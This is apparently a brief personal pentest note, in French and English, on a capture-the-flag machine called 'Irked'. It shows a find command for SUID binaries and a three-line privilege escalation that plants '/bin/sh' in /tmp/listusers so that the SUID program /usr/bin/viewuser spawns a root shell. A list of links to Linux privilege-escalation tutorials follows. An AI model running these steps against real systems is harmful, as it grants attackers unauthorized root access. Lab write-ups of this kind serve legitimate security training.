*********
[[https://github.com/nongiach/sudo_inject]]
*********
Irked :
Recherche de fichiers avec SUID permissions :
find / -perm -u=s -type=f 2>/dev/null
1 fichier intéressant trouvé : ''/usr/bin/viewuser''
Description :
So, when I run the program, I found that this application was being developed to set test user permissions but couldn’t find listusers file within /tmp. This program is, therefore, searching for data from the listusers file and the file is missing from the directory inside /tmp.
Utilisation :
echo '/bin/sh' > /tmp/listusers
chmod 777 /tmp/listusers
/usr/bin/viewuser
*********
[[https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/|Linux Privilege Escalation via Automated Script]]
[[https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/|Exploiting Wildcard for Privilege Escalation]]
[[https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/|Linux Privilege Escalation by Exploiting Cronjobs]]
[[https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/|Linux Privilege Escalation using LD_Preload]]
[[https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/|Linux Privilege Escalation Using PATH Variable]]
[[https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/|Linux Privilege Escalation using Misconfigured NFS]]
[[https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/|Linux Privilege Escalation using Sudo Rights]]
[[https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/|Linux Privilege Escalation using SUID Binaries]]
[[https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/|Editing /etc/passwd File for Privilege Escalation]]